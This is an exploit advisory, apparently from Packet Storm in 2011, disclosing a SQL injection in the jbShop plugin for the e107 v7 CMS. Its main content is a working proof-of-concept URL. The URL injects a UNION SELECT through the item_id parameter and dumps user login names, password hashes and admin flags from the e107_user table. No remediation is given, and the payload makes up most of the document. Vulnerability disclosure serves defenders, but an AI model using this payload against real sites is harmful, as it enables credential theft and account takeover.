jbShop SQL Injection

🗓️ 31 Oct 2011 00:00:00Reported by Robert CooperType

packetstorm🔗 packetstormsecurity.com👁 17 Views

jbShop SQL Injection in e107 v7 CMS plugi

`# Exploit Title: jbShop - e107 v7 CMS plugin - SQL Injection vulnerability  
# Author: Robert Cooper (admin[at]websiteauditing.org)  
# Software Link: http://sourceforge.net/projects/jbshop/  
# Tested on: [Linux/Windows 7]  
#Vulnerable Parameter:  
  
item_id=  
  
  
##############################################################  
PoC:  
  
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--  
  
  
##############################################################  
www.websiteauditing.org  
www.areyousecure.net  
  
# Shouts to the Belegit crew  
  
`

31 Oct 2011 00:00Current

sql injection e107 v7 plugin vulnerable parameter linux/windows 7 poc user_loginname user_password user_admin belegit crew